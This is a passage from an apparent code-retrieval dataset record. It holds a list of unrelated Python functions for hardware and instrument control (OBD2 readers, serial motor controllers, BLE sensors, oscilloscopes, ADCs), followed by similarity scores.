used to determine which reader commands to send (separate from OBD2 cmds)\n #\n self.debug = 0 # debug level, 0 = off, higher is more...\n #\n self.State = 0 # 1 is connected, 0 is disconnected/failed\n self.recwaiting = 0 # 0 = no record waiting (can send new cmd), 1 = record waiting to be retrieved\n #\n self.Style = 'old' # 'old', 'can' used to determine how to interpret the results, gets updated by connect()\n self.Headers = 0 # ECU headers, 1 is on, 0 is off\n #\n self.attr = {} # the list of device attributes and their values\n self.attr_cmds = {} # the list of supported attribute at commands, and the associated attribute\n #\n self.RecordTrace = 0 # 0 = no, 1 = yes record a trace of the serial session\n self.tf_out = None # file to record trace to\n #\n if self.Type == \"SERIAL\":\n self.Port = None # connect later\n elif self.Type == \"FILE\":\n self.tf = None # open later\n self.eof = 0\n else:\n pass\n #\n if self.Device == \"ELM327\":\n self.attr_cmds = {\n 'AT@1' : \"Brand\",\n 'AT@2' : \"Brand2\",\n 'ATI' : \"Firmware\",\n 'ATDP' : \"Proto\",\n 'ATDPN' : \"ProtoNum\",\n 'ATRV' : \"Voltage\",\n }\n else:\n pass\n self.clear_attr()", "def configure(self):\n\t\tself.outChannel = CAClient(self.pvstring + \".AOUT\")\n\t\tself.outChannel.configure()\n\t\tself.inChannel = CAClient(self.pvstring + \".TINP\")\n\t\tself.inChannel.configure()", "def create_circuit(self, circuit, database, str_obj, current_date):\r\n if self._circuit_type in (HC, DHW):\r\n return Circuit(self._connector, circuit[ID],\r\n database, str_obj, self._circuit_type,\r\n self._bus_type, current_date)\r\n elif self._circuit_type == SC:\r\n return BasicCircuit(self._connector, circuit[ID],\r\n database, str_obj, self._circuit_type,\r\n self._bus_type)\r\n return None", "def __init__(self, c, device, sensor_name):\n self._cuby = c\n self._device_id = device['id']\n self._sensor_name = sensor_name\n self._name = '{} {}'.format(\"CubyDev\", sensor_name)\n self._unique_id = 'cuby_sensor {}'.format(self._name)\n self._state = None", "def cvChin(ctrlName, r=1):\r\n # create a simple circle curve:\r\n curve = cmds.curve(n=ctrlName, d=3, p=[(0, 0.8*r, -0.5*r), (0, 0.9*r, -0.7*r), (0, 0, -0.5*r), (0, -0.8*r, -0.7*r), (0, -0.8*r, 1.4*r), (0, -0.3*r, 1.3*r), (0, 0, 1.2*r), (0, 0, 0), (0, 0.8*r, -0.3*r), (0, 0.8*r, -0.5*r)] )\r\n # rename curveShape:\r\n renameShape([curve])\r\n return curve", "def connection_test(\n schemes,\n switching,\n vcw,\n device,\n target_resistance=1,\n abs_err=0.1,\n set_command=\"set_meas_resistance\",\n):\n command = build_command(device, set_command)\n read = build_command(device, \"get_read\")\n vcw.write(device, command)\n res = []\n # Switch on the output of the device and do some other configs\n outputON = build_command(device, (\"set_output\", \"1\"))\n outputOFF = build_command(device, (\"set_output\", \"0\"))\n mode = build_command(device, (\"set_resistance_mode\", \"AUTO\"))\n wire2 = build_command(device, (\"set_resitance_state\", \"OFF\"))\n readingMode = build_command(device, (\"set_reading_mode\", \"RES\"))\n readingModeOLD = build_command(device, (\"set_reading_mode\", \"CURR\"))\n setrear = build_command(device, (\"set_terminal\", \"REAR\"))\n setfront = build_command(device, (\"set_terminal\", \"FRONT\"))\n vcw.write(device, setrear)\n vcw.write(device, mode)\n vcw.write(device, wire2)\n vcw.write(device, readingMode)\n vcw.write(device, outputON)\n for name in schemes:\n switching.switch_to_measurement(name)\n res.append(float(vcw.query(device, read)))\n l.info(\"Resistances of 
Needle {}: {} Ohms\".format(name, res[-1]))\n switching.switch_to_measurement(\"None\")\n vcw.write(device, readingModeOLD)\n vcw.write(device, outputOFF)\n vcw.write(device, setfront)\n closeness = np.isclose([target_resistance for x in res], res, rtol=0, atol=abs_err)\n\n if np.all(closeness):\n return True, res\n else:\n return np.array(schemes)[~closeness], res", "def d2in():\n\tsetState(\"D2\", \"-DI-PHDGN-02:CON\", CON_IN)", "def get_dacb(tbc):\n return {\n channel: tbc.i2c_socket.yaml_config['roc_s0']['sc']['ch'][channel]['Dacb']\n for channel in range(1, 12)\n }", "def __init__(self, busRestriction=0, devAddressRestriction=0, serialNumber=\"\"):\n self.handle = libcaer.caerDeviceOpen(1, libcaer.CAER_DEVICE_DAVIS, busRestriction, devAddressRestriction, serialNumber)\n self.info = libcaer.caerDavisInfoGet(self.handle)\n\n print(\"device ID: \" + str(libcaer.caer_davis_info_deviceID_get(self.info)))\n\n if (libcaer.caer_davis_info_deviceIsMaster_get(self.info)):\n print(\"device is Master\")\n else:\n print(\"device is Slave\")\n\n print(\"device Serial Number: \" + str(libcaer.caer_davis_info_deviceSerialNumber_get(self.info)))\n print(libcaer.caer_davis_info_deviceString_get(self.info))\n\n self.dvsSizeX = libcaer.caer_davis_info_dvsSizeX_get(self.info)\n self.dvsSizeY = libcaer.caer_davis_info_dvsSizeY_get(self.info)\n\n self.apsSizeX = libcaer.caer_davis_info_apsSizeX_get(self.info)\n self.apsSizeY = libcaer.caer_davis_info_apsSizeY_get(self.info)\n\n # init default biases\n ret = libcaer.caerDeviceSendDefaultConfig(self.handle)\n if(ret == True):\n print(\"Default biases loaded\")\n else:\n print(\"Error while loading default biases\")\n raise Exception\n\n # set blocking data exchange\n ret = libcaer.caerDeviceConfigSet(self.handle, libcaer.CAER_HOST_CONFIG_DATAEXCHANGE, libcaer.CAER_HOST_CONFIG_DATAEXCHANGE_BLOCKING, True)\n if(ret == True):\n print(\"Data exchange set to blocking mode\")\n else:\n print(\"Error in communicating with the device, please check your setup\")\n raise Exception\n\n # start data transfer from device\n ret = libcaer.caerDeviceDataStart(self.handle, None, None, None, None, None)\n if(ret == True):\n print(\"Data transfer started\")\n else:\n print(\"Error in starting data transfer\")\n raise Exception", "def speed_cadence_connect(self):\n self._status_update(\"Speed and Cadence: Scanning...\")\n # Save advertisements, indexed by address\n advs = {}\n for adv in self.ble.start_scan(ProvideServicesAdvertisement, timeout=5):\n if CyclingSpeedAndCadenceService in adv.services:\n self._status_update(\"Speed and Cadence: Found an advertisement\")\n # Save advertisement. Overwrite duplicates from same address (device).\n advs[adv.address] = adv\n\n self.ble.stop_scan()\n self._status_update(\"Speed and Cadence: Stopped scanning\")\n if not advs:\n # Nothing found. 
Go back and keep looking.\n return []\n\n # Connect to all available CSC sensors.\n self.cyc_connections = []\n for adv in advs.values():\n self.cyc_connections.append(self.ble.connect(adv))\n self._status_update(\"Speed and Cadence: Connected {}\".format(len(self.cyc_connections)))\n\n self.cyc_services = []\n for conn in self.cyc_connections:\n self.cyc_services.append(conn[CyclingSpeedAndCadenceService])\n self._status_update(\"Pyloton: Finishing up...\")\n\n return self.cyc_connections", "def one_transition_spectrum_cd(self,tr):\n \n\n ta = tr[\"ta\"] # TimeAxis\n rr = tr[\"rr\"] # transition dipole strength\n om = tr[\"om\"] # frequency - rwa\n gg = tr[\"gg\"] # natural broadening (constant or time dependent)\n fwhm = tr[\"fwhm\"] # Additional gaussian broadening of the spectra\n sgm = fwhm/(2*numpy.sqrt(2*numpy.log(2)))\n \n # CD and fluorescence can be calculated in this step\n # TODO if rotatory strength defined calculate also circular dichroism spectra\n # TOOD calculate fluorescence spectra (for fluorescence there should be a switch because it should be calculated only for the first transition) \n \n \n if self.system._has_system_bath_coupling:\n# ct = tr[\"ct\"] # correlation function\n \n # convert correlation function to lineshape function\n #gt = self._c2g(ta,ct.data)\n gt = tr[\"gt\"]\n # calculate time dependent response\n at = numpy.exp(-gt -1j*om*ta.data)\n else:\n # calculate time dependent response\n at = numpy.exp(-1j*om*ta.data) \n# plt.figure()\n# plt.title(\"Absorption\")\n# plt.plot(ta.data,numpy.real(at))\n# plt.plot(ta.data,numpy.imag(at))\n \n \n if len(gg) == 1:\n gam = gg[0]\n rt = numpy.exp(gam*ta.data)\n at *= rt\n #print(\"Constant: \", rt[20], len(at))\n else:\n rt = numpy.exp((gg)*ta.data) \n at *= rt\n #print(\"Time dependent: len = \", rt[20], len(rt))\n \n if fwhm!=0.0:\n gauss = numpy.exp(-2*(numpy.pi**2)*(sgm**2)*(ta.data**2))\n at *= gauss\n \n # Fourier transform the result\n ft = rr*numpy.fft.hfft(at)*ta.step\n ft = numpy.fft.fftshift(ft)\n # invert the order because hfft is a transform with -i\n ft = numpy.flipud(ft) \n # cut the center of the spectrum\n Nt = ta.length #len(ta.data) \n return ft[Nt//2:Nt+Nt//2]", "def connect():\n try:\n MotorController.serial_connection = serial.Serial(\"/dev/ttyUSB0\")\n MotorController.serial_connection.timeout = 1\n MotorController.serial_connection.baudrate = 115200\n MotorController.serial_connection.xonxoff = True\n MotorController.serial_connection.stopbits = serial.STOPBITS_ONE\n MotorController.serial_connection.parity = serial.PARITY_NONE\n MotorController.serial_connection.bytesize = serial.EIGHTBITS\n MotorController.is_connected = True\n MotorController.serial_connection.write('G0 X4\\r\\n'.encode('utf-8')) #Need to do an absolute move on any axis to be able to do relative moves\n MotorController.serial_connection.write('b!%\\n'.encode('utf-8')) #This line allows for the first command to complete else the command never ends. 
Don't know why maybe some end of line character or buffer bug\n except serial.SerialException as error:\n return 'Could not connect to motor controller ' + error.__str__()", "def DAC(fp):\n length = unpack('>H', fp.read(2))[0]\n _remaining = length - 2\n\n _tc, _tb, _cs = [], [], []\n while _remaining:\n tc, tb = _split_byte(fp.read(1))\n _cs.append(unpack('>B', fp.read(1))[0])\n _remaining -= 2\n _tc.append(tc)\n _tb.append(tb)\n\n info = {\n 'La' : length,\n 'Tc' : _tc,\n 'Tb' : _tb,\n 'Cs' : _cs\n }\n\n return info", "def set_c(self, c):\n self.c = c", "def ocpc(self, ocpc):\n\n self._ocpc = ocpc", "def connectivity(band, method, sfreq):\n from neuropype_ephy.interfaces.mne.spectral import SpectralConn\n # if not method:\n # method = ('imcoh',)\n freq_bands = [list(t) for t in band]\n\n sp_conn = pe.Node(interface=SpectralConn(), name='sp_conn')\n # sp_conn.inputs.con_method = con_method\n sp_conn.inputs.sfreq = sfreq\n sp_conn.iterables = [('freq_band', freq_bands), ('con_method', method)]\n return sp_conn", "def performOpen(self, options={}):\n self.switch = USB_Digital_Switch() # Create an instance of the switch class\n self.serial_number = str(self.getAddress())\n\n status = self.establish_connection() # Connect the switch (pass the serial number as an argument if required)\n if status > 0:\n resp = self.switch.Send_SCPI(\":MN?\", \"\") # Read model name\n self.model_number = str(resp[2])\n self.setModel(self.model_number)\n self.log(self.model_number, level = 30)", "def c(self):\n return self._c", "def cdap_interaction_coefficients(configs_dir):\n f = os.path.join(configs_dir, 'cdap_interaction_coefficients.csv')\n return pd.read_csv(f, comment='#')", "def __init__(\n self,\n channel,\n discharge_pin,\n leds_object=None,\n temperature_sensors=None,\n current_sensors=None,\n low_voltage_cutoff=2.5,\n start_discharge_voltage_cutoff=3,\n temperature_cutoff=50,\n ):\n self.channel = str(channel)\n self.low_voltage_cutoff = low_voltage_cutoff\n self.start_discharge_voltage_cutoff = start_discharge_voltage_cutoff\n self.temperature_cutoff = temperature_cutoff\n self.discharge_pin = Pin(discharge_pin, Pin.OUT)\n self.leds = leds_object\n self.temperature_sensors = temperature_sensors\n self.current_sensors = current_sensors\n self.state = \"empty\"\n self.led_state = 0\n self.discharge_stats = None\n self.temperature = 0\n\n self.voltage_and_current = self.request_voltage_and_current()\n self.current = self.request_current()\n\n self.discharge_pin.off()", "def _config_md(self):\n self.cntrl[\"imin\"] = 0\n self.cntrl[\"ntx\"] = 1\n self.cntrl[\"irest\"] = 0\n self.cntrl[\"maxcyc\"] = 0\n self.cntrl[\"ncyc\"] = 0\n self.cntrl[\"dt\"] = 0.002\n self.cntrl[\"nstlim\"] = 5000\n self.cntrl[\"ntpr\"] = 500\n self.cntrl[\"ntwe\"] = 500\n self.cntrl[\"ntwr\"] = 5000\n self.cntrl[\"ntwx\"] = 500\n self.cntrl[\"ntxo\"] = 1\n self.cntrl[\"ioutfm\"] = 1\n self.cntrl[\"ntf\"] = 2\n self.cntrl[\"ntc\"] = 2\n self.cntrl[\"ntt\"] = 3\n self.cntrl[\"gamma_ln\"] = 1.0\n self.cntrl[\"ig\"] = -1", "def __init__(self, i2c, gain=1, data_rate=None, mode=Mode.SINGLE,\n address=_ADS1X15_DEFAULT_ADDRESS, ):\n self.i2c_device = i2c\n self._i2c_addr = address\n self._last_pin_read = None\n self._data_rate = None\n self._gain = None\n self._mode = None\n self._channelMask = 0x00\n info = self._chip_info()\n self._chan_count = info[3]\n self._shift_fact = info[2]\n self._is_diff = False\n self._data = array.array('i', [0]*self._chan_count)\n self.gain = gain\n self.mode = mode\n self.data_rate = data_rate if data_rate 
else self._data_rate_default()\n print(ansi.GREEN +\"[{0:>12}] {1:35} ({2}): ok\"\n .format(info[0], \"4-channel A/D\", info[1]) +ansi.BLACK)", "def read_bits_c(self, ctrl_pin):\n while True:\n self.read_bits(ctrl_pin)\n time.sleep(1)", "def set_comms_mode(self):", "def setCh(self, ch):\n if (self.model == 'TDS'):\n # according to the manual, RIBanary mode with 2-bit width is\n # the fastest mode for data transfer.\n # but I have to think 1-bit transfer ought to be faster.\n self.write('DATa:SOUrce CH'+str(ch)+\n '; ENCdg RIBinary; STARt 1; STOP 2500; WIDth 1\\n')\n # obtain vertical scale and offset (for calibration)", "def _start_device(self):\r\n enabled = [1,1,1,0]\r\n self._data = [np.empty(self._samples,dtype=np.int16) for i in range(3)]\r\n self._data_buffer = [x.ctypes for x in self._data]\r\n self._timebase = self.get_timebase(self._sampling_time)\r\n self.v_rangeAPI = [7,7,7,0] # 5V range\r\n self.v_range = [CHANNEL_RANGE[i][\"rangeV\"] for i in self.v_rangeAPI]\r\n with self._driver_lock:\r\n for i,v,en in zip(range(4),self.v_rangeAPI,enabled): # three active channels\r\n m = self._lib.ps2000aSetChannel(self._handle,\r\n c_int32(i), # channel\r\n c_int16(en), # enabled\r\n c_int32(1), # DC coupling\r\n c_int32(v), # voltage range (API value)\r\n c_float(0)) # 0V offset\r\n check_result(m)\r\n\r\n if en:\r\n m = self._lib.ps2000aSetDataBuffer(self._handle,\r\n c_int32(i), # channel\r\n self._data_buffer[i],\r\n c_int32(self._samples),\r\n c_uint32(0), # segment index\r\n c_int32(0)) # ratio mode\r\n check_result(m)\r\n\r\n threshold_v = 3\r\n threshold_adc = int(threshold_v * MAX_EXT / self.v_range[2])\r\n m = self._lib.ps2000aSetSimpleTrigger(self._handle,\r\n c_int16(1), # enabled\r\n c_int32(2), # Trigger off Channel C\r\n c_int16(threshold_adc),\r\n c_int32(2), # direction = rising\r\n c_uint32(0), # no delay\r\n c_int16(2000)) # autotrigger after 2 seconds if no trigger occurs\r\n check_result(m)\r\n\r\n # Send AWG Info to Picoscope\r\n delta_phase = c_uint32()\r\n output_freq = 1/self._sampling_duration\r\n # output_freq = 1E6\r\n m = self._lib.ps2000aSigGenFrequencyToPhase(self._handle,\r\n c_double(output_freq),\r\n c_int32(0),\r\n c_uint32(len(self._waveform)),\r\n byref(delta_phase))\r\n check_result(m)\r\n delta_phase = int(delta_phase.value)\r\n offset_voltage = 1\r\n pk2pk = 2\r\n # output_freq = 1E6\r\n # wave_type = {'sine':0,'square':1,'triangle':2,'DC':3,\r\n # 'rising sawtooth':4,'falling sawtooth':5,'sin(x)/x':6,\r\n # 'Gaussian':7,'half-sine':8}\r\n waveformPtr = self._waveform.ctypes\r\n trigger_type = 2 # siggen gate high\r\n trigger_source = 4 # software trigger\r\n m = self._lib.ps2000aSetSigGenArbitrary(self._handle,\r\n c_int32(int(offset_voltage*1E6)), \r\n c_uint32(int(pk2pk*1E6)),\r\n c_uint32(delta_phase), # start delta phase\r\n c_uint32(delta_phase), # stop delta phase\r\n c_uint32(0), # delta phase increment\r\n c_uint32(0), # dwell count\r\n waveformPtr, # arbitrary waveform\r\n c_int32(self._samples), # arbitrary waveform size\r\n c_int32(0), # sweep type for delta phase\r\n c_int32(0), # extra operations\r\n c_int32(0), # index mode\r\n c_uint32(1), # shots\r\n c_uint32(0), # sweeps\r\n c_int32(trigger_type),\r\n c_int32(trigger_source),\r\n c_int16(0)) # extIn threshold\r\n check_result(m)\r\n # m = self._lib.ps2000aSetSigGenBuiltIn(self._handle,\r\n # c_int32(int(offset_voltage*1E6)), # offset voltage\r\n # c_uint32(int(pk2pk*1E6)),# peak to peak voltage\r\n # c_int32(wave_type['square']), # wave type\r\n # c_float(output_freq), # start 
frequency\r\n # c_float(output_freq), # stop frequency\r\n # c_float(0), # increment\r\n # c_float(0), # dwell count\r\n # c_int32(0), # sweep type\r\n # c_int32(0), # operation\r\n # c_uint32(4), # shots\r\n # c_uint32(0), # sweeps\r\n # c_int32(trigger_type), \r\n # c_int32(trigger_source),\r\n # c_int16(0)) # extIn threshold\r\n # check_result(m)\r\n\r\n # for i in enabled:\r\n # if i:\r\n # m = self._lib.ps2000aSetDataBuffer(self._handle,\r\n # c_int32(i), # channel\r\n # self._data_buffer[i],\r\n # c_int32(self._samples),\r\n # c_uint32(0), # segment index\r\n # c_int32(0)) # ratio mode\r\n # check_result(m)\r\n\r\n self._save_thread = Thread(target=self.save,args=(self._save_queue,))\r\n self._save_thread.daemon = True\r\n self._save_thread.start()\r\n\r\n self._process_thread = Thread(target=self.process,args=(self._process_queue,self._save_queue))\r\n self._process_thread.daemon = True\r\n self._process_thread.start()\r\n\r\n self._collect_thread = Thread(target=self.run_loop,args=(self._process_queue,))\r\n self._collect_thread.daemon = True\r\n self._collect_thread.start()\r\n\r\n return True", "def init(self):\n self.IP_ADDRESS = \"192.168.16.55\"\n self.PORT = 8888\n self.windFreakConnection = windFreakClient.ConnectionConstantFrequency(IP_ADDRESS=self.IP_ADDRESS, port=self.PORT) \n self.initialised=True\n return \"%s init successful\" % self.hardwareActionName", "def duty_cycle(self,duty_cycle):\n self.load.write(f'TRAN:DCYC {duty_cycle}')", "def get_cmdb_data(device_type):\n pass", "def _computeCcdExposureId(self, dataId):\n pathId = self._transformId(dataId)\n visit = pathId['visit']\n ccd = pathId['ccd']\n return visit*200 + ccd", "def d2out():\n\tsetState(\"D2\", \"-DI-PHDGN-02:CON\", CON_OUT)", "def get_c(layer_configs):\n net_config = layer_configs['000_net']\n return net_config.get('channels', 3)", "def initConnTermFrame(self,referenceID):\r\n # Strip any colons in the mac address\r\n self.referenceID = referenceID\r\n\r\n # Set the frame content\r\n self.content = \"\"\r\n\r\n # Set the content length\r\n self.contentLength = 0\r\n\r\n # Set the correct frame message type\r\n self.mesgType = MULTIPLEXER_CONN_TERM", "def __getChemDrawCmd(self):\n return self.__getCmd(\"JUMBO_HOME\", \"cdx2cml\", \"ChemDraw to CML\")", "def establish_connection(self, data, data_size, acpi, dest_group_addr):\n # -----------------------------------\n # -> (1) Sending Connection request\n # -----------------------------------\n conn_resp_object = self.connection_request()\n # <- Retrieving channel_id & status from Connection response\n conn_channel_id = conn_resp_object.channel_id\n conn_status = conn_resp_object.status\n self.channel_id = conn_channel_id\n print('Channel ID: ', conn_channel_id)\n print('Channel status: ', conn_status)\n print('-----------------------------------')\n # -----------------------------------\n # -> (2) Sending Connection State request\n # -----------------------------------\n state_resp_object = self.connection_state_request()\n # <- Retrieving channel_id & status from Connection State response\n state_channel_id = state_resp_object.channel_id\n state_status = state_resp_object.status\n print('Channel ID: ', state_channel_id)\n print('Channel status: ', state_status)\n print('-----------------------------------')\n # -----------------------------------\n # -> (3) Tunneling request\n # -----------------------------------\n tunnel_resp_object = self.tunneling_request(data, data_size, dest_group_addr, acpi)\n # <- Retrieving data from Tunneling response\n 
tunnel_channel_id = tunnel_resp_object.channel_id\n tunnel_status = tunnel_resp_object.status\n self.sequence_counter = tunnel_resp_object.sequence_counter\n print('Channel ID: ', tunnel_channel_id)\n print('Channel status: ', tunnel_status)\n print('Sequence counter: ', self.sequence_counter)\n print('-----------------------------------')\n # -----------------------------------\n # -> (4) Tunneling request read\n # -----------------------------------\n self.tunneling_request_read()", "def test_ccds(self):\n #TODO write ccds tests", "def get_ctf(ima):\n\tfrom EMAN2 import EMAN2Ctf\n\tctf_params = ima.get_attr(\"ctf\")\t\n\treturn ctf_params.defocus, ctf_params.cs, ctf_params.voltage, ctf_params.apix, ctf_params.bfactor, ctf_params.ampcont, ctf_params.dfdiff, ctf_params.dfang", "def DIOchannels(tree, DAQcard, DIOnum):\n diocardpath = '.SETTINGS.NI.NI_6133_DIO.DAQ_' + str(DAQcard)\n diopath = diocardpath + '.CHANNEL_' + str(DIOnum)\n tree.addNode(diopath)\n AddNodeWithTag(tree, diopath + ':CHANNEL_NAME', 'TEXT',\n 'USERNAME_DIOCARD' + str(DAQcard) + 'CH' + str(DIOnum))\n AddNodeWithTag(tree, diopath + ':NI_NAME', 'TEXT',\n 'NINAME_DIOCARD' + str(DAQcard) + 'CH' + str(DIOnum))", "def pcd(dw, qpts=50):\n w = w0+dw\n pcm.set_qpts(qpts)\n sml = pcm.sml_w(w)\n avgchi = pcm.avgchi\n pcm.set_qpts(0)\n sml2 = pcm.sml_w(w)\n print sml, log(sml) - pcm.offset, avgchi\n print sml2, log(sml2) - pcm.offset, pcm.avgchi", "def enable_cable_ports(cid):\n\n SQL.execute('''\n SELECT \n cpid,\n guid,\n port,\n hca\n FROM \n cable_ports \n WHERE\n cid = ?\n ''',(\n cid,\n ))\n\n for row in SQL.fetchall(): \n if row['hca']:\n vlog(3, 'skip enabling hca for p%s' % ( row['cpid'] ))\n elif not DISABLE_PORT_STATE_CHANGE:\n ib_mgt.enable_port(int(row['guid']), int(row['port']))" ]
[ "0.5991389", "0.5908873", "0.563912", "0.5434294", "0.54057074", "0.53454", "0.53262013", "0.5306355", "0.52807844", "0.52574426", "0.5246854", "0.5221757", "0.5210567", "0.51662695", "0.51509064", "0.5141476", "0.51294994", "0.5121288", "0.5110107", "0.5095082", "0.50932145", "0.5077673", "0.5072095", "0.5043145", "0.5042253", "0.50344265", "0.4938216", "0.49361742", "0.49114913", "0.4899763", "0.48927155", "0.48894477", "0.48772028", "0.48735327", "0.4867126", "0.48560908", "0.4855939", "0.4844126", "0.48439893", "0.48437482", "0.4843705", "0.4825818", "0.48248172", "0.4814526", "0.48091716", "0.48010376", "0.48000258", "0.47986856", "0.4777988", "0.47774637", "0.477718", "0.4777083", "0.47692075", "0.47685245", "0.47642013", "0.47604436", "0.47541267", "0.475226", "0.47493333", "0.4739708", "0.47343662", "0.47334373", "0.472136", "0.47158542", "0.47146788", "0.4711273", "0.46998245", "0.46996582", "0.46994895", "0.4697589", "0.4696797", "0.46946186", "0.46861428", "0.4677487", "0.4670255", "0.46695364", "0.46642157", "0.46548146", "0.4650252", "0.4638919", "0.46379697", "0.46368176", "0.46336836", "0.46313205", "0.46299815", "0.46234035", "0.4621793", "0.46184915", "0.461528", "0.46132112", "0.46099958", "0.46098462", "0.46096763", "0.4608119", "0.46076223", "0.46076125", "0.46070442", "0.46068588", "0.46009514", "0.46000397" ]
0.7094732
0
Find the last numbered image in the current directory.
def last_image(fileDir): lastNum = 0 lastImg = '' # find the name and number of the last image in the current directory for f in os.listdir(fileDir): if os.path.isfile(os.path.join(fileDir, f)): file_name = os.path.splitext(f)[0] file_name2 = file_name[4:] try: file_num = int(file_name2) if file_num > lastNum: lastNum = file_num lastImg = os.path.join(fileDir, f) except ValueError: 'The file name "%s" is not an integer. Skipping' % file_name return lastNum, lastImg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_last_counter():\n counter = imageNumStart\n if imageNumOn:\n image_ext = \".jpg\"\n search_str = imagePath + \"/*\" + image_ext\n file_prefix_len = len(imagePath + imageNamePrefix)+1\n try:\n # Scan image folder for most recent jpg file\n # and try to extract most recent number counter from file name\n newest = max(glob.iglob(search_str), key=os.path.getctime)\n count_str = newest[file_prefix_len:newest.find(image_ext)]\n print(\"%s INFO : Last Saved Image is %s Try to Convert %s\"\n % (get_now(), newest, count_str))\n counter = int(count_str)+1\n print(\"%s INFO : Next Image Counter is %i\"\n % (get_now(), counter))\n except:\n print(\"%s WARN : Restart Numbering at %i \"\n \"WARNING: Previous Files May be Over Written.\"\n % (get_now(), counter))\n return counter", "def _get_latest_inc(path):\n\n images = [os.path.join(path, image) for image in os.listdir(path) if '.png' in image]\n\n if not images:\n return 0\n else:\n return int(re.search('(?P<inc>\\d+).png$', max(images, key=os.path.getctime)).group('inc'))", "def find_last_image(self) -> List[str]:\n\n soup = self.load_page()\n url_to_down = soup.select('.comicimage')[0].get('src')\n\n filename = str(os.path.basename(url_to_down))\n\n return [url_to_down, filename]", "def LastImage(self, *args):\n return _BRepAlgo.BRepAlgo_Image_LastImage(self, *args)", "def determine_output_ending():\n file_found = False\n idx = 1\n while not file_found:\n if not os.path.isfile(LOG_DIR + \"/output%04d.png\" % (idx)):\n return \"%04d\" % (idx)\n idx += 1", "def find_last_image(self) -> List[str]:\n\n soup = self.load_page()\n\n txt_from_site = soup.select('.full-image-block')\n\n url_to_down = \"http://www.lunarbaboon.com/\" + str(txt_from_site[0])[\n str(txt_from_site).find('/storage'):str(txt_from_site).find(\n 'SQUARESPACE_CACHEVERSION=') + 37]\n filename = str(url_to_down)[35:48] + \".jpg\"\n\n return [url_to_down, filename]", "def get_latest_iteration(path):\n glob = os.path.join(path, '{}_[0-9]*'.format(FILE_PREFIX))\n log_files = tf.io.gfile.glob(glob)\n\n if not log_files:\n raise ValueError('No log data found at {}'.format(path))\n\n def extract_iteration(x):\n return int(x[x.rfind('_') + 1:])\n\n latest_iteration = max(extract_iteration(x) for x in log_files)\n return latest_iteration", "def get_max_imgid(cursor: db.Cursor, table: str) -> int:\r\n res = cursor.execute(f\"SELECT MAX({cng.BBOX_DB_IMGRNR}) FROM {table}\")\r\n maxid: int = res.fetchall()[0][0]\r\n\r\n if maxid is None:\r\n return -1\r\n else:\r\n return maxid", "def find_image(image_name):\n imgs = pyrax.images\n image = imgs.list(name=image_name)[0]\n\n # print image.id\n return image.id", "def get_latest_image():\n return sqldb.get_latest_image()", "def _last_exp_id(name, path):\n\n exp_id = 0\n output_dirs = listdir(path)\n exp_dirs = [s for s in output_dirs if name in s]\n if exp_dirs:\n ids = [int(s.split('_')[-1]) for s in exp_dirs]\n exp_id = max(ids)\n return exp_id", "def get_latest_image_from_directory(self, motion_target_dir):\n try:\n # Use a glob generator to find the newest image\n return max(glob.iglob('{0}/*.jpg'.format(motion_target_dir)),\n key=os.path.getctime)\n except ValueError as e:\n # Raise an error if we did not find any images\n raise MotionAlertError(\"Could not find any images in motion \"\n \"target directory: \"\n \"{0}\".format(motion_target_dir))\n except OSError as e:\n # Raise an error if we cannot access the directory.\n raise MotionAlertError(\"Could not find the motion target dir: \"\n \"{0}\".format(e))", "def 
get_output_number(dst):\n data = os.listdir(dst)\n print(data)\n if not data == []:\n last_record = sorted(data)[-1]\n print(last_record)\n hiphen_index = last_record.rfind(\"-\")\n print(hiphen_index)\n print(int(last_record[hiphen_index + 1:]))\n return int(last_record[hiphen_index + 1:])\n return 0", "def _find_last_checkpoint(self):\n highest_num, last_checkpoint = -np.inf, None\n for filename in os.listdir(self.logdir):\n # checkpoints look like logdir/model.ckpt-N\n # self._save_path is \"logdir/model.ckpt\"\n if os.path.basename(self._save_path) in filename:\n try:\n N = int(filename.split(\"-\")[1].split(\".\")[0])\n if N > highest_num:\n highest_num = N\n last_checkpoint = \"model.ckpt-\" + str(N)\n except ValueError:\n pass\n return os.path.join(self.logdir, last_checkpoint)", "def find_last_history_version():\n current_max = -1\n for file in os.listdir(os.getcwd()):\n if len(file) > 12 and file[:12] == \"leg_history_\":\n try:\n current_max = max(int(file[12:]), current_max)\n except ValueError:\n continue\n return current_max", "def get_image_index(name: str):\n base_name = os.path.basename(name)\n nums = pattern.findall(base_name)\n if len(nums) != num_count:\n raise BaseException(f\"can't exact index from the string: {name}\")\n return float(nums[num_sort_index])", "def get_latest_image(dirpath, valid_extensions=('jpg','jpeg','png')):\n\n # get filepaths of all files and dirs in the given dir\n valid_files = [os.path.join(dirpath, filename) for filename in os.listdir(dirpath)]\n # filter out directories, no-extension, and wrong extension files\n valid_files = [f for f in valid_files if '.' in f and \\\n f.rsplit('.',1)[-1] in valid_extensions and os.path.isfile(f)]\n\n if not valid_files:\n raise ValueError(\"No valid images in %s\" % dirpath)\n\n return max(valid_files, key=os.path.getmtime)", "def new_images_index(self):\n first = ct.c_long()\n last = ct.c_long()\n self.lib.GetNumberNewImages(ct.pointer(first), ct.pointer(last))\n\n return (first.value, last.value)", "def get_oldest_image():\n return sqldb.get_oldest_image()", "def getLastPlotfile(outputDir, test):\n \n plotNum = -1\n \n # start by finding the last plotfile\n for file in os.listdir(outputDir):\n if (os.path.isdir(file) and file.startswith(\"%s_plt\" % (test))):\n key = \"_plt\"\n index = string.rfind(file, key)\n plotNum = max(int(file[index+len(key):]), plotNum)\n\n if (plotNum == -1):\n warning(\"WARNING: test did not produce any output\")\n compareFile = \"\"\n else:\n compareFile = \"%s_plt%5.5d\" % (test, plotNum)\n\n return compareFile", "def get_image_column_row(filename):\n row, column = os.path.splitext(filename)[0][-5:].split(\"_\")\n return (int(column) - 1, int(row) - 1)", "def get_image_id(filename):\n del filename\n global GLOBAL_IMG_ID\n GLOBAL_IMG_ID += 1\n return GLOBAL_IMG_ID", "def get_next_img(self, current_img):\n list = self.listImages.previews\n indx_next = (list.index(current_img) + 1) % len(list)\n next_img = list[indx_next]\n return next_img", "def image_id_at(self, i):\n return i", "def get_latest_file(path):\n try:\n latest_iteration = get_latest_iteration(path)\n return os.path.join(path, '{}_{}'.format(FILE_PREFIX, latest_iteration))\n except ValueError:\n return None", "def getNextImage(self):\n self._images = self._api.updateImageNames()\n \n # Get index from local txt file. 
